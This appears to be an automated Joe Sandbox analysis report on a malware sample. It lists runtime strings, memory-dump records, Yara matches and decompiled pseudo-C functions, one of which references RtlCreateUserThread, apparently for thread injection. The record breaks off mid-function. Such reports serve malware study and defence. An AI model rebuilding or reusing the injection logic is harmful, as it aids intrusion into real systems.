                                                                                                                            0x0130abb3
                                                                                                                            0x0130abb3
                                                                                                                            0x0130abb8
                                                                                                                            0x0130abc0
                                                                                                                            0x0130abd1
                                                                                                                            0x0130abe0
                                                                                                                            0x0130abf1
                                                                                                                            0x0130ac00
                                                                                                                            0x0130ac05
                                                                                                                            0x0130ac0a
                                                                                                                            0x0130ac20
                                                                                                                            0x00000000
                                                                                                                            0x0130ac20
                                                                                                                            0x0130ab9e
                                                                                                                            0x0130abb2
                                                                                                                            0x00000000
                                                                                                                            0x0130acb3
                                                                                                                            0x0130acb3
                                                                                                                            0x0130acb8
                                                                                                                            0x0130acc0
                                                                                                                            0x0130acca

                                                                                                                            Strings
                                                                                                                            • freeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreachablenon-Go function at pc=oldoverflow is not nilprotocol not availableprotocol not suppo, xrefs: 0130AC25
                                                                                                                            • s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunsafe.Pointerwinapi error #work.full != 0 with GC prog<invalid Value>ASCII_Hex_DigitCreateHardLinkWDeviceIoControlDup, xrefs: 0130ABC5
                                                                                                                            • s.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left outstanding across sweep generationsattempt to execute system stack code on user stackcompileCallback: function argument frame too largemallocgc call, xrefs: 0130AC8F
                                                                                                                            • s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShareDelNew_Tai, xrefs: 0130ABE5, 0130AC65
                                                                                                                            • s.allocCount > s.nelemsschedule: holding locksshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (work.nwait > work.nprocAzerbaijan Standard TimeBangladesh Standard TimeCape Verde Standard TimeCert, xrefs: 0130AC0F
                                                                                                                            • runtime: s.allocCount= s.allocCount > s.nelemsschedule: holding locksshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (work.nwait > work.nprocAzerbaijan Standard TimeBangladesh Standard TimeCape , xrefs: 0130AC45
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShareDelNew_Tai$freeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreachablenon-Go function at pc=oldoverflow is not nilprotocol not availableprotocol not suppo$runtime: s.allocCount= s.allocCount > s.nelemsschedule: holding locksshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (work.nwait > work.nprocAzerbaijan Standard TimeBangladesh Standard TimeCape $s.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left outstanding across sweep generationsattempt to execute system stack code on user stackcompileCallback: function argument frame too largemallocgc call$s.allocCount > s.nelemsschedule: holding locksshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (work.nwait > work.nprocAzerbaijan Standard TimeBangladesh Standard TimeCape Verde Standard TimeCert$s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunsafe.Pointerwinapi error #work.full != 0 with GC prog<invalid Value>ASCII_Hex_DigitCreateHardLinkWDeviceIoControlDup
                                                                                                                            • API String ID: 0-1685633480
                                                                                                                            • Opcode ID: ec5f951c43afb22a40b4f3bb1a14f8bef904eae3082de50e57b203c29ff8752b
                                                                                                                            • Instruction ID: a14313655c51917f1f68c7ce6a9b95c00419e68ede17eae249c76abd00bd98e0
                                                                                                                            • Opcode Fuzzy Hash: ec5f951c43afb22a40b4f3bb1a14f8bef904eae3082de50e57b203c29ff8752b
                                                                                                                            • Instruction Fuzzy Hash: F2517072224B80C6CB14EB19F49036FBBA4F7D9B98F845562EA8D07B64DF38C540CB14
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno$_callnewhmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2761444284-0
                                                                                                                            • Opcode ID: f184c75cb4fe9d517fd2803ab05e678bf927ca3280fe055b55ab1d7bbf7b13c2
                                                                                                                            • Instruction ID: 2c6f59663c9e0188c0318931b9e3fa2b3e416783129f1dc286eede8fece02225
                                                                                                                            • Opcode Fuzzy Hash: f184c75cb4fe9d517fd2803ab05e678bf927ca3280fe055b55ab1d7bbf7b13c2
                                                                                                                            • Instruction Fuzzy Hash: A6412523311B8592FE07AB265C0C26E6694F765BAAF695024FD154BF45DF3CC406C32C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$free$AllocateBoundaryDeleteDescriptorHeap_callnewhfclosefwritemalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1599808278-0
                                                                                                                            • Opcode ID: 1645078cc00e2e9a92d86a82ed4a39e37a9649f3524a32f91329fbbb6e830b1d
                                                                                                                            • Instruction ID: c30f3c8d0abf982aff1eb3a2d379fb8eed50e1f6877c6bf84a1fe72ab08e1708
                                                                                                                            • Opcode Fuzzy Hash: 1645078cc00e2e9a92d86a82ed4a39e37a9649f3524a32f91329fbbb6e830b1d
                                                                                                                            • Instruction Fuzzy Hash: 64217722218E484BEA56FB2C4C597ADB2D1FB88321F64455DB14AC36D2EF34DD01839A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 72%
                                                                                                                            			E0000025B25BF8A75D94(long long __rbx, void* __rcx, signed char* __rdx, long long __rdi, long long __rsi, long long __rbp, long long* __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                            				void* __r14;
                                                                                                                            				void* _t30;
                                                                                                                            				void* _t33;
                                                                                                                            				void* _t34;
                                                                                                                            				void* _t35;
                                                                                                                            				void* _t38;
                                                                                                                            				void* _t39;
                                                                                                                            				void* _t40;
                                                                                                                            				void* _t41;
                                                                                                                            				void* _t42;
                                                                                                                            				void* _t44;
                                                                                                                            				signed char* _t69;
                                                                                                                            				signed char* _t72;
                                                                                                                            				void* _t77;
                                                                                                                            				void* _t87;
                                                                                                                            				void* _t88;
                                                                                                                            				void* _t90;
                                                                                                                            				void* _t91;
                                                                                                                            				void* _t92;
                                                                                                                            				int _t94;
                                                                                                                            
                                                                                                                            				_t44 = _t77;
                                                                                                                            				 *((long long*)(_t44 + 8)) = __rbx;
                                                                                                                            				 *((long long*)(_t44 + 0x10)) = __rbp;
                                                                                                                            				 *((long long*)(_t44 + 0x18)) = __rsi;
                                                                                                                            				 *((long long*)(_t44 + 0x20)) = __rdi;
                                                                                                                            				_t92 = __rcx;
                                                                                                                            				r12d = 0x8000;
                                                                                                                            				_t72 = __rdx;
                                                                                                                            				malloc(_t94);
                                                                                                                            				E0000025B25BF8A8B528(E0000025B25BF8A794CC(_t30, r12d, _t44, _t44, __rdx, 0xf8a8bcb4, __rcx, _t91), r12d, r12d, _t33, _t34, _t35, _t44, _t44, _t44, _t72, __rdi, _t72, _t87, _t90);
                                                                                                                            				free(_t88);
                                                                                                                            				if (_t44 == 0xffffffff) goto 0xf8a75eb2;
                                                                                                                            				_t69 =  &(_t72[0x2c]);
                                                                                                                            				if (( *_t72 & 0x00000010) == 0) goto 0xf8a75e89;
                                                                                                                            				_t38 =  *_t69 -  *0xf8a8bcbc; // -40
                                                                                                                            				if (_t38 != 0) goto 0xf8a75e1f;
                                                                                                                            				_t39 = _t69[1] -  *0xf8a8bcbd; // -42
                                                                                                                            				if (_t39 == 0) goto 0xf8a75e95;
                                                                                                                            				_t40 =  *_t69 -  *0xf8a8bcc0; // 0x23
                                                                                                                            				if (_t40 != 0) goto 0xf8a75e3f;
                                                                                                                            				_t41 = _t69[1] -  *0xf8a8bcc1; // 0x3d
                                                                                                                            				if (_t41 != 0) goto 0xf8a75e3f;
                                                                                                                            				_t42 = _t69[2] -  *0xf8a8bcc2; // 0x60
                                                                                                                            				if (_t42 == 0) goto 0xf8a75e95;
                                                                                                                            				malloc(??);
                                                                                                                            				E0000025B25BF8A794CC(_t30, r12d, _t44, _t44, _t88, 0xf8a8bac4, _t69);
                                                                                                                            				E0000025B25BF8A75ED4(_t42, _t44, _t92, _t69, _t69, _t72, _t44, _t72, __r8, _t92);
                                                                                                                            				r8d = 1;
                                                                                                                            				 *__r8();
                                                                                                                            				free(??);
                                                                                                                            				goto 0xf8a75e95;
                                                                                                                            				r8d = 0;
                                                                                                                            				if (E0000025B25BF8A8B530( *__r8(), r12d, r12d, _t33, _t34, _t35, _t44, _t44, _t44, _t72, _t69, _t72, _t87, _t90) != 0) goto 0xf8a75e05;
                                                                                                                            				return  *0xf8a8b500();
                                                                                                                            			}
























                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 761449704-0
                                                                                                                            • Opcode ID: 82c1dcce8c84437305b8f3727e8478a505c56d4b8d73e2610ad9c0e911897e27
                                                                                                                            • Instruction ID: 54e3b786f7373d4a52906a7304fa441db4e8460496dd9952b3e12710ab26530e
                                                                                                                            • Opcode Fuzzy Hash: 82c1dcce8c84437305b8f3727e8478a505c56d4b8d73e2610ad9c0e911897e27
                                                                                                                            • Instruction Fuzzy Hash: 4B31C423204A8145EE169B126C1D3AD6B51E746FF2F685511FE9507F96DF3CC443A338
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 54%
                                                                                                                            			E0000025B25BF8A6E258(void* __edx, void* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                                            				char _v40;
                                                                                                                            				void* __rdi;
                                                                                                                            				void* _t12;
                                                                                                                            				int _t19;
                                                                                                                            				void* _t21;
                                                                                                                            				void* _t31;
                                                                                                                            				long long _t33;
                                                                                                                            				void* _t50;
                                                                                                                            				void* _t62;
                                                                                                                            
                                                                                                                            				_t60 = __r8;
                                                                                                                            				_t51 = __rsi;
                                                                                                                            				_t31 = __rax;
                                                                                                                            				_a8 = __rbx;
                                                                                                                            				_a16 = __rbp;
                                                                                                                            				_a24 = __rsi;
                                                                                                                            				_t55 = __rcx;
                                                                                                                            				_t33 = __r8;
                                                                                                                            				_t12 = malloc(??);
                                                                                                                            				_t50 = __rax;
                                                                                                                            				if (__rax == 0) goto 0xf8a6e321;
                                                                                                                            				r8d = __edx;
                                                                                                                            				E0000025B25BF8A73230(_t12,  &_v40, __rcx);
                                                                                                                            				r8d = 0x400;
                                                                                                                            				if (E0000025B25BF8A73314(_t21, 0x400, __rax, __r8,  &_v40, __rax, __rax, __rsi, __rcx, __r8, _t62) != 0) goto 0xf8a6e2bb;
                                                                                                                            				free(??);
                                                                                                                            				goto 0xf8a6e321;
                                                                                                                            				E0000025B25BF8A7A52C(_t33, _t50, _t33, _t51, _t55, _t60, _t62);
                                                                                                                            				_t6 = _t31 - 1; // -1
                                                                                                                            				if (_t6 - 0xfffffffd > 0) goto 0xf8a6e307;
                                                                                                                            				E0000025B25BF8A73194(E0000025B25BF8A73274( &_v40),  &_v40);
                                                                                                                            				fwrite(??, ??, ??, ??);
                                                                                                                            				_t19 = fclose(??);
                                                                                                                            				goto 0xf8a6e2b4;
                                                                                                                            				free(??);
                                                                                                                            				"\\%s: %d"();
                                                                                                                            				return E0000025B25BF8A6CF60(8, _t19, _t16, _t31, _t55, _t16, _t31);
                                                                                                                            			}













                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$free$_callnewhfclosefwritemalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1696598829-0
                                                                                                                            • Opcode ID: 69b733fb4e4ad921f56162dc73f3c2970d3cc0b06fd22b9cef5d603a9174ec46
                                                                                                                            • Instruction ID: bfb7bafd351c54255a329bebeaf06c94a36ecc193bcdb4f6c4e393e9486dba5f
                                                                                                                            • Opcode Fuzzy Hash: 69b733fb4e4ad921f56162dc73f3c2970d3cc0b06fd22b9cef5d603a9174ec46
                                                                                                                            • Instruction Fuzzy Hash: C811A563304E8041EE11E622AC5D3AD5351E785BF1FA44225BE5D07FCADF3CC5058768
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2964073243-0
                                                                                                                            • Opcode ID: ad165a8e472b7aaa892af7d7af0973768dc21987dead314f6370e08c0323a7f5
                                                                                                                            • Instruction ID: 7ed0a4430ac6fc036ee65b51d8e8200b20ecf4e53b16979e43f0907a4871e159
                                                                                                                            • Opcode Fuzzy Hash: ad165a8e472b7aaa892af7d7af0973768dc21987dead314f6370e08c0323a7f5
                                                                                                                            • Instruction Fuzzy Hash: A3014F33525D494EFF1AA764CD5D3A43291EB1A337F64C244F019C69F2D7B844808239
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0000025B25BF8A842E4(signed int __ecx, void* __edx, signed int* __rax) {
                                                                                                                            				void* _t11;
                                                                                                                            				intOrPtr _t24;
                                                                                                                            				signed int* _t25;
                                                                                                                            				signed long long _t29;
                                                                                                                            
                                                                                                                            				if (__ecx != 0xfffffffe) goto 0xf8a84302;
                                                                                                                            				E0000025B25BF8A7B82C(__rax);
                                                                                                                            				 *__rax =  *__rax & 0x00000000;
                                                                                                                            				E0000025B25BF8A7B89C(__rax);
                                                                                                                            				 *__rax = 9;
                                                                                                                            				goto 0xf8a8434f;
                                                                                                                            				if (__ecx < 0) goto 0xf8a84337;
                                                                                                                            				if (__ecx -  *0xf8aa7384 >= 0) goto 0xf8a84337;
                                                                                                                            				_t29 = __ecx * 0x58;
                                                                                                                            				_t24 =  *((intOrPtr*)(0xf8aa3200 + (__ecx >> 5) * 8));
                                                                                                                            				if (( *(_t24 + _t29 + 8) & 0x00000001) == 0) goto 0xf8a84337;
                                                                                                                            				_t25 =  *((intOrPtr*)(_t24 + _t29));
                                                                                                                            				goto 0xf8a84353;
                                                                                                                            				E0000025B25BF8A7B82C(_t25);
                                                                                                                            				 *_t25 =  *_t25 & 0x00000000;
                                                                                                                            				_t11 = E0000025B25BF8A7B89C(_t25);
                                                                                                                            				 *_t25 = 9;
                                                                                                                            				return E0000025B25BF8A7BEC4(_t11);
                                                                                                                            			}








                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2964073243-0
                                                                                                                            • Opcode ID: 5d0a3678b06b18b0d0a5973f5caa8efc4352bf65b823eb5b547b2bae06e3a16f
                                                                                                                            • Instruction ID: 5d43e477a8f1a4ce7212cbbbe5fbf41b31ed0596d174351ba7e1e18ba5db45ca
                                                                                                                            • Opcode Fuzzy Hash: 5d0a3678b06b18b0d0a5973f5caa8efc4352bf65b823eb5b547b2bae06e3a16f
                                                                                                                            • Instruction Fuzzy Hash: 3901AFB3602E4485FE071B24EC893ACA650DB60B37FB58305F63906FD2C73884069A3C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 67%
                                                                                                                            			E0000025B25BF8A72F5C(void* __edi, void* __eflags, signed long long __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, char _a24, long long _a32) {
                                                                                                                            				long long _v48;
                                                                                                                            				signed long long _v56;
                                                                                                                            				void* __rdi;
                                                                                                                            				void* __r13;
                                                                                                                            				void* _t24;
                                                                                                                            				intOrPtr _t26;
                                                                                                                            				char* _t28;
                                                                                                                            				void* _t33;
                                                                                                                            				void* _t34;
                                                                                                                            				void* _t35;
                                                                                                                            				void* _t38;
                                                                                                                            				void* _t42;
                                                                                                                            				intOrPtr _t56;
                                                                                                                            				char _t57;
                                                                                                                            				void* _t61;
                                                                                                                            				void* _t62;
                                                                                                                            				signed long long _t65;
                                                                                                                            				signed long long _t68;
                                                                                                                            				signed long long _t101;
                                                                                                                            				void* _t104;
                                                                                                                            				signed long long _t106;
                                                                                                                            				void* _t116;
                                                                                                                            				void* _t118;
                                                                                                                            				signed long long _t119;
                                                                                                                            
                                                                                                                            				_t68 = __rax;
                                                                                                                            				_t60 = __edi;
                                                                                                                            				_a8 = __rbx;
                                                                                                                            				_a16 = __rbp;
                                                                                                                            				_a32 = __rsi;
                                                                                                                            				_t104 = __rcx;
                                                                                                                            				E0000025B25BF8A73124(0x494, _t61, __rax, __rbx, __rsi, __rbp);
                                                                                                                            				_t109 = _t68;
                                                                                                                            				E0000025B25BF8A73278(0x94, _t68);
                                                                                                                            				r13d = 0x100;
                                                                                                                            				_t119 = _t68;
                                                                                                                            				E0000025B25BF8A73278(r13d, _t68);
                                                                                                                            				_t106 = _t68;
                                                                                                                            				E0000025B25BF8A73278(r13d, _t68);
                                                                                                                            				E0000025B25BF8A73278(r13d, _t68);
                                                                                                                            				E0000025B25BF8A73278(r13d, _t68);
                                                                                                                            				_a24 = r13d;
                                                                                                                            				_t24 =  *0xf8a8b468();
                                                                                                                            				_a24 = r13d;
                                                                                                                            				E0000025B25BF8A8B5F8(_t24, _t42, 0x494, r13d, __edi, _t61, _t62, _t68, _t68, _t68,  &_a24, _t104, _t106, _t116, _t118);
                                                                                                                            				_t26 = E0000025B25BF8A6D8EC(r13d, _t68, _t68, _t68);
                                                                                                                            				r8d = 0x100;
                                                                                                                            				r13d = _t26;
                                                                                                                            				if ( *0xf8a8b5f0() == 0) goto 0xf8a73039;
                                                                                                                            				_t28 = strrchr(??, ??);
                                                                                                                            				_t65 = _t68;
                                                                                                                            				if (_t65 == 0) goto 0xf8a73039;
                                                                                                                            				if (_t65 != 0) goto 0xf8a73040;
                                                                                                                            				 *_t119 = 0x94;
                                                                                                                            				E0000025B25BF8A8B600(_t28, _t42, 0, 0x5c, _t60, _t61, _t62, _t68, 0xf8a8bc32, _t119, _t68, _t104, _t106, _t116, _t118);
                                                                                                                            				 *0xf8aa6b20 =  *((intOrPtr*)(_t119 + 4));
                                                                                                                            				E0000025B25BF8A6CBB0( *((intOrPtr*)(_t119 + 4)));
                                                                                                                            				_t33 = E0000025B25BF8A6CC48(E0000025B25BF8A6CBB0( *((intOrPtr*)(_t119 + 8))),  *(_t119 + 0xc) & 0x0000ffff, _t104);
                                                                                                                            				_t101 = "RtlCreateUserThread"; // 0x74616572436c7452
                                                                                                                            				_t34 = E0000025B25BF8A6CC18(_t33,  *(_t119 + 0xc) & 0x0000ffff, _t104);
                                                                                                                            				_t56 =  *((intOrPtr*)("%s\\%s")); // 0x255c7325
                                                                                                                            				_t35 = E0000025B25BF8A6CC18(_t34, _t56, _t104);
                                                                                                                            				_t57 = "RtlCreateUserThread"; // 0x436c7452
                                                                                                                            				E0000025B25BF8A6CC18(E0000025B25BF8A6CC18(_t35, _t57, _t104), r13d, _t104);
                                                                                                                            				_v48 = 0xf8a8bc32;
                                                                                                                            				_v56 = _t68;
                                                                                                                            				_t38 = E0000025B25BF8A794CC(_t42, 0, _t68, _t106, _t101 >> 0x20, 0xf8a8bc38, _t68);
                                                                                                                            				if ( *((char*)(_t106 + (_t68 | 0xffffffff) + 1)) != 0) goto 0xf8a730de;
                                                                                                                            				_t39 =  >  ? 0x3a : _t38;
                                                                                                                            				r8d =  >  ? 0x3a : _t38;
                                                                                                                            				E0000025B25BF8A6CBD0(_t60, 0xf8a8bc32, _t104);
                                                                                                                            				return E0000025B25BF8A7320C(_t109, _t106);
                                                                                                                            			}




























                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _snprintfmallocstrrchr
                                                                                                                            • String ID: %s\%s$RtlCreateUserThread
                                                                                                                            • API String ID: 3587327836-2969288844
                                                                                                                            • Opcode ID: 5738243969cd75681ae2df40fc4f50feb926135a9c3fab60068e190284ab21a5
                                                                                                                            • Instruction ID: fd7ac9c3ecfda0f3c91ae6f008ea634a492dc638f862d10847f4791dd1843575
                                                                                                                            • Opcode Fuzzy Hash: 5738243969cd75681ae2df40fc4f50feb926135a9c3fab60068e190284ab21a5
                                                                                                                            • Instruction Fuzzy Hash: 6341B362704E4046EF06EB62AC1976E6791F785BE1FA45121BE450BFAACF3CC4438768
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 78%
                                                                                                                            			E01325CC0(signed char __eax, void* __ebx, signed int __ecx, void* __edi, signed int __esi, signed long long __rax, signed long long __rbx, long long __rbp, signed long long __r10, void* __r11, void* __r13, void* __r14, void* __r15, signed long long _a8, signed long long _a16) {
                                                                                                                            				char _v8;
                                                                                                                            				signed int _v16;
                                                                                                                            				signed long long _v24;
                                                                                                                            				unsigned long long _v32;
                                                                                                                            				signed char _t51;
                                                                                                                            				void* _t54;
                                                                                                                            				void* _t55;
                                                                                                                            				void* _t73;
                                                                                                                            				signed int _t80;
                                                                                                                            				void* _t82;
                                                                                                                            				void* _t83;
                                                                                                                            				signed int _t84;
                                                                                                                            				void* _t86;
                                                                                                                            				void* _t91;
                                                                                                                            				signed long long _t102;
                                                                                                                            				signed long long _t116;
                                                                                                                            				unsigned long long _t123;
                                                                                                                            				unsigned long long _t124;
                                                                                                                            				long long _t128;
                                                                                                                            				signed long long _t130;
                                                                                                                            				signed long long _t131;
                                                                                                                            				intOrPtr _t133;
                                                                                                                            				signed long long _t136;
                                                                                                                            				unsigned long long _t138;
                                                                                                                            				signed long long _t141;
                                                                                                                            				signed long long _t143;
                                                                                                                            				unsigned long long _t144;
                                                                                                                            				signed long long _t145;
                                                                                                                            				void* _t153;
                                                                                                                            				unsigned long long _t158;
                                                                                                                            				long long _t161;
                                                                                                                            				unsigned long long _t162;
                                                                                                                            				intOrPtr _t163;
                                                                                                                            				signed long long _t164;
                                                                                                                            				void* _t165;
                                                                                                                            				void* _t166;
                                                                                                                            				void* _t167;
                                                                                                                            				void* _t168;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t168 = __r15;
                                                                                                                            					_t167 = __r14;
                                                                                                                            					_t166 = __r13;
                                                                                                                            					_t165 = __r11;
                                                                                                                            					_t164 = __r10;
                                                                                                                            					_t149 = __rbp;
                                                                                                                            					_t116 = __rbx;
                                                                                                                            					_t97 = __rax;
                                                                                                                            					_t84 = __esi;
                                                                                                                            					_t83 = __edi;
                                                                                                                            					_t73 = __ebx;
                                                                                                                            					_t51 = __eax;
                                                                                                                            					if(_t153 <=  *((intOrPtr*)(__r14 + 0x18))) {
                                                                                                                            						goto L23;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t149 =  &_v8;
                                                                                                                            					_t124 =  *((intOrPtr*)(__rax + 0x10078));
                                                                                                                            					_t144 = _t124 + 0;
                                                                                                                            					_t138 = _t144;
                                                                                                                            					_t143 = _t144 >> 0x16;
                                                                                                                            					asm("o16 nop [eax+eax]");
                                                                                                                            					if( *((intOrPtr*)(__rax + 0x10088)) <= _t143) {
                                                                                                                            						L19:
                                                                                                                            						__eflags = 0;
                                                                                                                            						return 0;
                                                                                                                            					} else {
                                                                                                                            						L2:
                                                                                                                            						_a16 = __rbx;
                                                                                                                            						_a8 = __rax;
                                                                                                                            						_t80 = __ecx & 0x003fffff;
                                                                                                                            						_t125 = _t124 >> 0xd;
                                                                                                                            						if(__rbx >  ~((_t124 >> 0xd) - 0x200)) {
                                                                                                                            							L11:
                                                                                                                            							_t54 = E01324F60(_t51, _t84, _t97, _t116, _t125, 0, _t138, _t149, _t164, _t167);
                                                                                                                            							__eflags = _t97;
                                                                                                                            							if(_t97 != 0) {
                                                                                                                            								L15:
                                                                                                                            								_t145 = _t97;
                                                                                                                            								_t130 = _t116;
                                                                                                                            								goto L16;
                                                                                                                            							} else {
                                                                                                                            								L12:
                                                                                                                            								__eflags = _a16 - 1;
                                                                                                                            								if(_a16 == 1) {
                                                                                                                            									_t128 =  *0x1465368; // 0x7fffffffffff
                                                                                                                            									 *((long long*)(_a8 + 0x10078)) = _t128;
                                                                                                                            								}
                                                                                                                            								__eflags = 0;
                                                                                                                            								return 0;
                                                                                                                            							}
                                                                                                                            						} else {
                                                                                                                            							L3:
                                                                                                                            							_t158 =  *((intOrPtr*)(__rax + 0x68));
                                                                                                                            							_t163 =  *((intOrPtr*)(__rax + 0x60));
                                                                                                                            							_t91 = _t158 - _t143;
                                                                                                                            							if(_t91 <= 0) {
                                                                                                                            								L22:
                                                                                                                            								_t97 = _t143;
                                                                                                                            								_t123 = _t158;
                                                                                                                            								E013588E0();
                                                                                                                            								goto L23;
                                                                                                                            							} else {
                                                                                                                            								L4:
                                                                                                                            								_t162 =  *((intOrPtr*)(_t163 + _t143 * 8));
                                                                                                                            								asm("dec ecx");
                                                                                                                            								if(_t91 >= 0) {
                                                                                                                            									_t158 = _t162 >> 0x15;
                                                                                                                            									r8d = r8d & 0x001fffff;
                                                                                                                            									__eflags = r8d;
                                                                                                                            								} else {
                                                                                                                            									r8d = 0x200000;
                                                                                                                            								}
                                                                                                                            								if(_t116 > _t158) {
                                                                                                                            									goto L11;
                                                                                                                            								} else {
                                                                                                                            									L8:
                                                                                                                            									_t141 = _t138 >> 0x23;
                                                                                                                            									if(_t141 >= 0x2000) {
                                                                                                                            										L21:
                                                                                                                            										E013588E0();
                                                                                                                            										goto L22;
                                                                                                                            									} else {
                                                                                                                            										L9:
                                                                                                                            										_v16 = _t143;
                                                                                                                            										_v32 = _t158;
                                                                                                                            										_t133 =  *((intOrPtr*)(_t97 + 0x78 + _t141 * 8));
                                                                                                                            										_t85 = _t84 & 0x00001fff;
                                                                                                                            										_t143 = _t143 << 7;
                                                                                                                            										_t134 = _t133 + _t143;
                                                                                                                            										_t102 = _t133 + _t143;
                                                                                                                            										_t54 = E01327860(_t51, _t82, _t84 & 0x00001fff, _t102, _t116, _t125, _t149, _t158, _t163, _t164, _t165, _t167);
                                                                                                                            										if(_t102 == 0xffffffff) {
                                                                                                                            											L20:
                                                                                                                            											E01332340(_t134, _t149, _t167);
